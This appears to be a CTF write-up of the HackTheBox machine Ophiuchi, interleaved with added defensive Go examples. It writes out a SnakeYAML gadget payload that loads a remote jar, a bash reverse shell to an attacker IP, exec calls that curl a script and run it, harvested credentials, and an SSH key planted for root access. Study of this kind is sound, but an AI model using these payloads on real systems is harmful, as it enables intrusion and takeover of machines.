Hackthebox Ophiuchi - Writeup — fmash's blog

fmash16 - Student, Infosec & Linux Enthusiast
(https://github.com/fmash16) (https://twitter.com/fmash16) (https://reddit.com/user/fmash16)

This is a medium difficulty hackthebox machine, exploited using a YAML deserialization vulnerability in SnakeYAML, which is used in Java applications, and by modifying a wasm file to get root privileges.

We write the IP of the machine to our /etc/hosts file:

    echo "10.10.10.227 ophiuchi.htb" >> /etc/hosts

Nmap Scan

Open ports:

- 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
- 8080/tcp open http Apache Tomcat 9.0.38

Enumeration

Port 8080 - Apache Tomcat server

Going over to the page, we find a YAML parser. YAML is a human-readable data-serialization language. It is commonly used for configuration files and in applications where data is being stored or transmitted. So let's check if we can exploit it using a deserialization vulnerability. Googling for a bit, we find that SnakeYAML, which is used in Java applications, is vulnerable to deserialization. Found a really good Medium blog by Swapneil Kumar Dash here (https://medium.com/@swapneildash/snakeyaml-...ilization-exploited-...). We can use this deserialization vulnerability to get code execution. The original paper is to be found at https://github.com/mbechler/marshalsec. And the YAML payload we are going to use is found at https://github.com/artsploit/yaml-payload.
SnakeYAML deserialization exploit

We clone the repo and edit the AwesomeScriptEngineFactory.java file to execute our desired commands.

    git clone https://github.com/artsploit/yaml-payload

We can execute system commands using Runtime.getRuntime().exec(). We write a bash script revshell.sh as follows:

    #!/bin/sh
    bash -i >& /dev/tcp/10.10.14.6/8888 0>&1

Next we insert the commands to be executed on the target machine. We use curl to get revshell.sh from our machine and execute it.

    package artsploit;

    import javax.script.ScriptEngine;
    import javax.script.ScriptEngineFactory;
    import java.io.IOException;
    import java.util.List;

    public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

        public AwesomeScriptEngineFactory() {
            try {
                Runtime.getRuntime().exec("curl htt...");
                Runtime.getRuntime().exec("bash /tmp/...");
            } catch (IOException e) {
                e.printStackTrace();
            }
        }

        // the remaining ScriptEngineFactory methods of the file are left unchanged
    }

Now, as per the instructions, we use the following commands to get our payload jar file:

    cd yaml-payload
    javac src/artsploit/AwesomeScriptEngineFactory.java
    jar -cvf yaml-payload.jar -C src/ .

Now we have our payload jar file. We start a python web server on port 80 and insert the following YAML into the parser to get RCE. We also open a nc listener on port 8888 to get our reverse shell.
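Why the parser on port 8080 is exploitable at all: SnakeYAML's default Constructor treats any `!!fully.qualified.Name` tag as a Java class to instantiate, which is what the artsploit payload relies on. The fix on the application side is to build the parser with `new Yaml(new SafeConstructor())`, which resolves only the core YAML types. The Go program below is an added example, not code from this writeup or from the artsploit repo: a pre-parse check a defender can put in front of such an endpoint, or run over request logs, that reports every explicit global tag which is not a core YAML 1.1 type. Both sample documents are constructed; the one shaped like the gadget chain uses ATTACKER-HOST as a placeholder, not a real address.

```go
package main

import (
	"fmt"
	"regexp"
)

// Core YAML 1.1 tags (tag:yaml.org,2002:<name>). These are the only global
// tags a safe loader should resolve; any other name under the "!!" shorthand
// is a Java class for SnakeYAML's default Constructor to instantiate.
var coreTags = map[string]bool{
	"str": true, "int": true, "float": true, "bool": true, "null": true,
	"binary": true, "timestamp": true, "map": true, "omap": true,
	"pairs": true, "set": true, "seq": true, "merge": true, "value": true,
	"yaml": true,
}

// tagRe matches both spellings of a global tag: the "!!name" shorthand and the
// verbose "!<tag:yaml.org,2002:name>" form. Local tags ("!name") are not
// matched: SnakeYAML resolves classes only under the tag:yaml.org,2002: prefix.
var tagRe = regexp.MustCompile(`!!([A-Za-z_][A-Za-z0-9_.$]*)|!<tag:yaml\.org,2002:([A-Za-z_][A-Za-z0-9_.$]*)>`)

// UnsafeYAMLTags returns, in order of first appearance, every global tag in
// doc that is not a core YAML type. An empty result means the document asks
// the loader for nothing but plain scalars, sequences and mappings.
func UnsafeYAMLTags(doc string) []string {
	seen := map[string]bool{}
	var out []string
	for _, m := range tagRe.FindAllStringSubmatch(doc, -1) {
		name := m[1]
		if name == "" {
			name = m[2]
		}
		if coreTags[name] || seen[name] {
			continue
		}
		seen[name] = true
		out = append(out, name)
	}
	return out
}

// Constructed sample inputs. gadgetDoc has the shape of the SnakeYAML gadget
// chain used against this box; ATTACKER-HOST is a placeholder, not a real host.
const benignDoc = `server:
  name: !!str 8080
  ports: [22, 8080]
  deploy: !!bool yes
`

const gadgetDoc = `!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://ATTACKER-HOST/payload.jar"]
  ]]
]
`

func main() {
	for name, doc := range map[string]string{"benign": benignDoc, "gadget": gadgetDoc} {
		tags := UnsafeYAMLTags(doc)
		if len(tags) == 0 {
			fmt.Printf("%s: only core YAML tags, safe to hand to the parser\n", name)
			continue
		}
		fmt.Printf("%s: REJECT, non-core global tags request Java classes: %v\n", name, tags)
	}
}
```

The check is deliberately a reject-on-sight filter rather than a parser: a request that names Java classes has no legitimate reason to reach a configuration endpoint, so logging the tag names it carried is the useful detection signal.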
    python3 -m http.server 80

    !!javax.script.ScriptEngineManager [
      !!java.net.URLClassLoader [[
        !!java.net.URL ["http://10.10.14.6/yaml-paylo..."]
      ]]
    ]

We can now get our reverse shell as user tomcat.

Privilege Escalation - User

Going to the home directory, we find a user named admin. Browsing around, we find the user creds in the file .../tomcat/conf/tomcat-users.xsd. We find the following in the file:

    username="admin" password="whythereisalimit"

Creds found:

    User: admin
    Password: whythereisalimit

We can now ssh into the machine as user admin using the obtained creds.

Privilege Escalation - root

First, we check what sudo capabilities our user admin has got using sudo -l. We find the following:

    (ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go

So we can run /usr/bin/go run /opt/wasm-functions/index.go with root privileges. Let's check out the file. We get the following:

    package main

    import (
        "fmt"
        wasm "github.com/wasmerio/wasmer-go/wasmer"
        "os/exec"
        "log"
    )

    func main() {
        bytes, _ := wasm.ReadBytes("main.wasm")
        instance, _ := wasm.NewInstance(bytes)
        defer instance.Close()
        init := instance.Exports["info"]
        result, _ := init()
        f := result.String()
        if f != "1" {
            fmt.Println("Not ready to deploy")
        } else {
            fmt.Println("Ready to deploy")
            out, err := exec.Command("/bin/sh", "deploy.sh").Output()
            if err != nil {
                log.Fatal(err)
            }
            fmt.Println(string(out))
        }
    }

Here we see that functions and variables are imported from the main.wasm file and the value of the variable f is checked: if it equals 1, we get "Ready to deploy" and /bin/sh deploy.sh is executed.

What's notable here is that an absolute path is not used for main.wasm and the deploy.sh files, so we can manipulate these. These files will be read from our current working directory, from where we run the index.go file. We make our working directory in tmp and copy over the main.wasm file.

    cd /tmp
    mkdir work && cd work
    cp /opt/wasm-functions/main.wasm ./

We write our own deploy.sh file that echoes out the id of the user.

    #!/bin/sh
    echo $(id)

Now we run the following as sudo:

    sudo /usr/bin/go run /opt/wasm-functions/index.go

We get "Not ready to deploy". So the value of f, which is read from the wasm file, is not 1.

Wasm is short for WebAssembly. WebAssembly is an open standard that defines a portable binary-code format for executable programs, and a corresponding textual assembly language, as well as interfaces for facilitating interactions between such programs and their host environment.
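Two things make index.go a root path: it opens main.wasm and deploy.sh by relative name, so the files are resolved in whatever directory the sudo caller stands in, and nothing checks that the module it loads is the one the administrator deployed. (A sudo rule for `go run` also hands root a compiler and its environment; a compiled, root-owned binary is the easier thing to constrain.) The Go code below is an added example, not the box's index.go and not a hardened version of it: it shows the check a privileged launcher should make before loading any artifact. The path must be absolute, must not be a symlink, the file and its parent directory must belong to the expected owner and be writable by nobody else, and the content must match a SHA-256 digest pinned at deploy time. PinnedWasmSHA256 is a placeholder, the owner-uid check uses syscall.Stat_t and so assumes Linux, and main() demonstrates on a constructed file in a temporary directory.

```go
package main

import (
	"crypto/sha256"
	"crypto/subtle"
	"encoding/hex"
	"fmt"
	"os"
	"path/filepath"
	"syscall"
)

// PinnedWasmSHA256 is the digest a launcher pins at deploy time. PLACEHOLDER:
// this is not the digest of the real /opt/wasm-functions/main.wasm.
const PinnedWasmSHA256 = "0000000000000000000000000000000000000000000000000000000000000000"

// SHA256Hex is what an operator runs once over the deployed module to obtain
// the value to pin.
func SHA256Hex(data []byte) string {
	sum := sha256.Sum256(data)
	return hex.EncodeToString(sum[:])
}

// ownedAndPrivate rejects a file or directory that is not owned by owner or
// that group or world can write: a writable parent directory is enough to
// swap the file underneath a fixed path. Assumes Linux (syscall.Stat_t).
func ownedAndPrivate(path string, f os.FileInfo, owner uint32) error {
	if st, ok := f.Sys().(*syscall.Stat_t); !ok || st.Uid != owner {
		return fmt.Errorf("%s: not owned by uid %d", path, owner)
	}
	if perm := f.Mode().Perm(); perm&0o022 != 0 {
		return fmt.Errorf("%s: mode %04o is writable by group or others", path, perm)
	}
	return nil
}

// VerifyArtifact returns nil only if path is safe for a privileged program to
// load: absolute (the caller's working directory plays no part), not a
// symlink, a regular file owned by owner and private, in a private directory
// owned by owner, and matching the pinned SHA-256 digest wantHex.
func VerifyArtifact(path, wantHex string, owner uint32) error {
	if !filepath.IsAbs(path) {
		return fmt.Errorf("%s: relative path resolves against the caller's cwd", path)
	}
	fi, err := os.Lstat(path) // Lstat inspects a link itself instead of following it
	if err != nil {
		return err
	}
	if fi.Mode()&os.ModeSymlink != 0 {
		return fmt.Errorf("%s: refusing to follow a symlink", path)
	}
	if !fi.Mode().IsRegular() {
		return fmt.Errorf("%s: not a regular file", path)
	}
	if err := ownedAndPrivate(path, fi, owner); err != nil {
		return err
	}
	dir := filepath.Dir(path)
	di, err := os.Stat(dir)
	if err != nil {
		return err
	}
	if err := ownedAndPrivate(dir, di, owner); err != nil {
		return err
	}
	data, err := os.ReadFile(path)
	if err != nil {
		return err
	}
	got := SHA256Hex(data)
	if subtle.ConstantTimeCompare([]byte(got), []byte(wantHex)) != 1 {
		return fmt.Errorf("%s: sha256 %s does not match the pinned %s", path, got, wantHex)
	}
	return nil
}

func main() {
	dir, err := os.MkdirTemp("", "wasm-launcher") // created mode 0700, owner only
	if err != nil {
		fmt.Println(err)
		return
	}
	defer os.RemoveAll(dir)
	me := uint32(os.Getuid())

	// Constructed stand-in for main.wasm: only its bytes matter for the digest.
	module := []byte("\x00asm\x01\x00\x00\x00")
	path := filepath.Join(dir, "main.wasm")
	if err := os.WriteFile(path, module, 0o644); err != nil {
		fmt.Println(err)
		return
	}
	pinned := SHA256Hex(module)
	fmt.Println("deployed module:", VerifyArtifact(path, pinned, me))
	fmt.Println("relative path:  ", VerifyArtifact("main.wasm", pinned, me))
	os.WriteFile(path, append(module, 0x01), 0o644) // a swapped or edited module
	fmt.Println("edited module:  ", VerifyArtifact(path, pinned, me))
}
```

In the scenario above, /tmp/work/main.wasm would fail on three counts before the digest is even read: the path was never absolute in the launcher, the directory belongs to admin rather than root, and the file is not the pinned one.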
The text-readable format of a WASM binary is WAT (WebAssembly Text). We can manipulate the value by editing the wasm file in this format. We install the toolsuite https://github.com/webassembly/wabt. We have 2 binaries, wasm2wat and wat2wasm, that we can use. We transfer the main.wasm file from the target machine to our local machine using nc:

    cat main.wasm | nc {your-ip} {your-port}    (on target)
    nc -lnvp {your-port} > main.wasm            (on local)

We convert the wasm to wat and get the following:

    wasm2wat main.wasm > main.wat
    cat main.wat

    (module
      (type (;0;) (func (result i32)))
      (func $info (type 0) (result i32)
        i32.const 0)
      (table (;0;) 1 1 funcref)
      (memory (;0;) 16)
      (global (;0;) (mut i32) (i32.const 1048576))
      (global (;1;) i32 (i32.const 1048576))
      (global (;2;) i32 (i32.const 1048576))
      (export "memory" (memory 0))
      (export "info" (func $info))
      (export "__data_end" (global 1))
      (export "__heap_base" (global 2)))

Here we see that the value of f is a constant 0; we change that to 1, our required value.

    [-] i32.const 0
    [+] i32.const 1

Now we convert the wat back to wasm and move it to our target machine working directory.

    wat2wasm main.wat
    scp main.wasm admin@ophiuchi.htb:/tmp/work

Now, we run the sudo command again.
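The wat listing makes the design flaw explicit: $info takes no input and returns the literal 0, so the "ready to deploy" gate is a constant baked into a file the launcher never authenticates. The Go program below is an added example (not the writeup's code and not part of wabt) that reads the export and code sections of a module straight from the binary and reports when an exported function's body is nothing more than `i32.const N; end`, which is the audit an operator can run over deployed modules without installing wabt. It assumes a module that imports no functions. SampleWasm is a constructed minimal module with the same $info function as the wasm2wat output above; the memory, table and globals are left out.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// SampleWasm is a constructed minimal module: one function of type () -> i32, body "i32.const 0; end", exported as "info".
var SampleWasm = []byte{
	0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, // "\0asm", version 1
	0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, // type section (id 1): one functype () -> i32
	0x03, 0x02, 0x01, 0x00, // function section (id 3): func 0 has type 0
	0x07, 0x08, 0x01, 0x04, 'i', 'n', 'f', 'o', 0x00, 0x00, // export section (id 7): "info" -> func 0
	0x0a, 0x06, 0x01, 0x04, 0x00, 0x41, 0x00, 0x0b, // code section (id 10): no locals; i32.const 0; end
}

// reader is a bounds-checked cursor with a sticky error: decode a run of fields, check err once.
type reader struct {
	buf []byte
	pos int
	err error
}

func (r *reader) byte() byte {
	if r.pos >= len(r.buf) {
		r.err = errors.New("unexpected end of module")
		return 0
	}
	r.pos++
	return r.buf[r.pos-1]
}

// leb decodes a LEB128 integer of at most five groups; signed selects the i32.const operand form.
func (r *reader) leb(signed bool) int64 {
	for v, shift := int64(0), uint(0); shift < 35; shift += 7 {
		b := r.byte()
		v |= int64(b&0x7f) << shift
		if b&0x80 == 0 {
			if signed && b&0x40 != 0 {
				v |= -1 << (shift + 7) // sign-extend from the last group
			}
			return v
		}
	}
	r.err = errors.New("LEB128 value too long")
	return 0
}

// vec returns the next length-prefixed byte string (section payload, name or body), never past the module.
func (r *reader) vec() []byte {
	n := int(r.leb(false))
	if r.err != nil || n > len(r.buf)-r.pos {
		r.err = errors.New("field length exceeds module size")
		return nil
	}
	r.pos += n
	return r.buf[r.pos-n : r.pos]
}

// ExportedConstant parses a wasm v1 module that imports no functions and reports N when the function
// exported as name has the body "i32.const N; end": a gate that observes nothing and is decided entirely
// by whoever controls the file. Any other body, or a malformed module, is an error.
func ExportedConstant(wasm []byte, name string) (int32, error) {
	if len(wasm) < 8 || string(wasm[:4]) != "\x00asm" || binary.LittleEndian.Uint32(wasm[4:8]) != 1 {
		return 0, errors.New("not a WebAssembly v1 module")
	}
	r, funcIdx, bodies := &reader{buf: wasm, pos: 8}, int64(-1), [][]byte(nil)
	for r.pos < len(r.buf) && r.err == nil {
		id := r.byte()
		s := &reader{buf: r.vec()} // the section payload, walked on its own cursor
		for n := s.leb(false); (id == 7 || id == 10) && n > 0 && s.err == nil; n-- {
			if id == 10 { // code section: one size-prefixed body per defined function
				bodies = append(bodies, s.vec())
			} else if ename, kind, idx := string(s.vec()), s.byte(), s.leb(false); kind == 0x00 && ename == name {
				funcIdx = idx // export entry whose kind 0x00 marks a function
			}
		}
		if r.err == nil && (id == 7 || id == 10) { // other sections are only skipped, not decoded
			r.err = s.err
		}
	}
	if r.err != nil || funcIdx < 0 || funcIdx >= int64(len(bodies)) {
		return 0, fmt.Errorf("no exported function %q with a body (%v)", name, r.err)
	}
	b := &reader{buf: bodies[funcIdx]}
	if b.leb(false) != 0 || b.byte() != 0x41 { // no local declarations, then i32.const (0x41)
		return 0, fmt.Errorf("%q is not a bare i32.const", name)
	}
	v := b.leb(true)
	if b.byte() != 0x0b || b.pos != len(b.buf) || b.err != nil { // end (0x0b) and nothing after it
		return 0, fmt.Errorf("%q computes something beyond a constant", name)
	}
	return int32(v), nil
}

func main() {
	v, err := ExportedConstant(SampleWasm, "info")
	fmt.Printf("info() = %d (err: %v): a constant gate is fixed by the file, not by any runtime check\n", v, err)
}
```

Run over the real module, a result of 0 or 1 from this check tells an operator that the deploy decision was never computed at all, only stored, which is why the integrity of main.wasm is the whole security boundary of index.go.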
And this time we get command execution as root:

    Ready to deploy
    uid=0(root) gid=0(root) groups=0(root)

We get our id_rsa.pub using ssh-keygen and paste it into the authorized keys file at /root/.ssh/ using the deploy.sh file, to be able to SSH into the machine as root.

    #!/bin/sh
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABA...zHy+9fuMs= root@kali" >> /root/.ssh/authorized_keys

Now we can ssh into root and get our root.txt file.

    ssh root@ophiuchi.htb
    cat root.txt

Generated with a modified version of ssg5 (https://github.com/fmash16/ssg5). By fmash16 © 2020-2020
